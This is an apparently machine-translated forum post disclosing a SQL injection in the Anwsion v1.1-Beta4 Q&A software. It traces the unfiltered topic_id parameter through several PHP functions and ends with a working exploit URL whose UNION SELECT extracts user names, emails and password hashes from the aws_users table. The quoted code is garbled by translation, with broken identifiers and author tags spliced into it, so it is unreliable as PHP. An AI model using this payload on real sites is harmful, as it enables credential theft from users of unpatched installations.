Anwsion (v1.1-Beta4) Injection Vulnerability

Because the 3hack of Jesus used this program and promised to help read it. However, due to the lack of time, it was just last night that the code was well written, it seems a little difficult for me to be a programmer, especially for processing and splitting url parameters, like writing foreign programs .. it looks so painful !! However, compared with the Typecho and TextCUBE I used to see earlier, it is much easier for them to write code ~ Okay, no nonsense. Go to the Code: \ app \ home \ main. php (85): public function implements e_action () {// omitting ........... by. rices-> Forum: T00ls. net-> Blog: Rices. soif ($ _ GET ['category ']) {if (is_numeric ($ _ GET ['category']) // It is said that it can be injected here before, so isnum is used .. {$ category_info = $ this-> model ('system')-> get_category_info ($ _ GET ['category ']);}/* omitted ...... * /// start the injection! By. Rices-> Forum: T00ls. Net-> Blog: Rices. soif (TPL: is_output ('block/content_question.tpl.htm', 'home/other e') {if (! $ _ GET ['sort _ type']) {$ _ GET ['sort _ type'] = 'new ';} if ($ _ GET ['sort _ type'] = 'unresponse') {$ _ GET ['answer _ count'] = '0 ';} $ question_list = $ this-> model ('question')-> get_questions_list ($ _ GET ['page'], get_setting ('contents _ per_page '), $ _ GET ['sort _ type'], $ _ GET ['topic _ id'], $ this-> user_id, $ category_info ['id'], $ _ GET ['answer _ count'], $ _ GET ['day']); // $ _ GET ['topic _ id'] directly introduces fvck. fvck! By. rices-> Forum: T00ls. net-> Blog: Rices. soTPL: assign ('Question _ list', $ question_list); TPL: assign ('Question _ list_bit ', TPL: output ('Question/ajax/list ', false); // omitting .... www.2cto.com continues to chase $ this-> model ('question')-> get_questions_list function, \ models \ question. php (63): public function get_questions_list ($ page = 1, $ pre_page = 10, $ sort = 'hot ', $ topic_id = 0, $ uid = null, $ category_id = null, $ answer _ Count = null, $ day = 30) {$ uid = intval ($ uid); $ user_id_list = array (); $ user_info_list = array (); $ user_list = array (); $ question_info_list = array (); $ question_list = array (); $ limit = calc_page_limit ($ page, $ pre_page ); if ($ sort = 'hot ') {$ question_info_list = $ this-> get_hot_question ($ category_id, $ topic_id, $ limit, $ day ); // continue to bring $ topic_id. rices-> Forum: T00ls. net-> Blog: Rices. so} // omitted ...... B Y. Rices-> Forum: T00ls. Net-> Blog: Rices. so, run the get_hot_question function, \ models \ question. php (216 ):? View Code PHPpublic function get_hot_question ($ category_id = 0, $ topic_id = null, $ limit = '0, 10', $ day = 30) {$ day = intval ($ day ); if (! $ Day) {$ add_time = '0';} else if ($ day = 1) {$ add_time = strtotime ('-1 Day ');} else {$ add_time = strtotime ('-'. $ day. 'day');} if ($ category_id) {$ question_all = $ this-> fetch_all ('Question ', "add_time> ". $ add_time. "AND focus_count> 0 AND agree_count> 0 AND answer_count> 0 AND category_id IN (". implode (',', $ this-> model ('system')-> get_category_with_child_ids ('Question ', $ category_id )). ')');} Else if ($ topic_id) // {$ topic_ids = array (); if (is_array ($ topic_id) {$ topic_ids = $ topic_id ;} else {$ topic_ids [] = $ topic_id;} // The get_question_ids_by_topics_ids function is added without any filtering. rices-> Forum: T00ls. net-> Blog: Rices. soif ($ question_ids = $ this-> model ('topic ')-> get_question_ids_by_topics_ids ($ topic_ids, 10, null, 'Question _ id DESC ')) {$ question_all = $ this-> fetch_all ('question', "add_time> ". $ Add_time. "AND question_id IN (". implode (',', $ question_ids ). ')', 'popular _ value desc', $ limit) ;}} else {$ question_all = $ this-> fetch_all ('Question ', 'add _ time> '. $ add_time, 'popular _ value DESC ', $ limit);} return $ question_all;} finally, in the get_question_ids_by_topics_ids function, the o (cost _ limit) o ~~ \ Models \ topic. php (693 ):? View Code PHPfunction get_question_ids_by_topics_ids ($ topic_ids, $ limit, $ where = null, $ order = 'Update _ time DESC ') {if (! Is_array ($ topic_ids) {$ topic_id_in = $ topic_ids;} else {$ topic_id_in = implode (',', $ topic_ids);} if ($ where) {$ where = 'and '. $ where;} $ _ order = explode ('', $ order); if (! $ Where AND $ _ order [0] = 'Question _ id') {$ result = $ this-> query_all ("SELECT question_id FROM ". $ this-> get_table ('topic _ question '). "WHERE topic_id IN (". $ topic_id_in. ") order ". $ order, $ limit); // It is executed directly in the database and generated by injection ~~ By. Rices-> Forum: T00ls. Net-> Blog: Rices. so} else {// omitted... let's lose an exp first: http://www.bkjia.com /? /Home/category E/category? Sort_type-hot _ answer_count-1 _ day-1 _ topic_id-55) % 20and % 201 = 2% 20 union % 20 select % 20 concat % 28 (select % 20 concat (user_name, 0x2D3E, email, 0x2D3E, password) % 20 from % 20aws_users % 20 limit % 29%) % 23

I think many of these programs are black boxes. It may be troublesome for big hackers. There are other similar injections, so there will be no more attacks. This program is extremely insecure and can be used as an external force! Over ~